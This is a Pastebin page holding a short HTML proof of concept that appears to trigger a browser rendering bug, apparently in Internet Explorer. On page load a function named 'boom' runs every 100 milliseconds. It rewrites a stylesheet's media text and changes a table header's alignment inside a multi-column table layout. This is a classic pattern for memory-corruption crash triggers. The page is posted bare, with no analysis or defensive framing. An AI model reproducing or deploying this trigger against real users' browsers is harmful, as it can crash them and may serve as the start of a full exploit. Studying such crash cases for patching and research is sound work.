Advertisement
Guest User

Untitled

a guest
Feb 27th, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.49 KB | None | 0 0
  1. <!-- saved from url=(0014)about:internet -->
  2. <style>
  3. .class1 { float: left; column-count: 5; }
  4. .class2 { column-span: all; columns: 1px; }
  5. table {border-spacing: 0px;}
  6. </style>
  7. <script>
  8. function boom() {
  9. document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
  10. th1.align = "right";
  11. }
  12. </script>
  13. <body onload="setInterval(boom,100)">
  14. <table cellspacing="0">
  15. <tr class="class1">
  16. <th id="th1" colspan="5" width=0></th>
  17. <th class="class2" width=0><div class="class2"></div></th>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement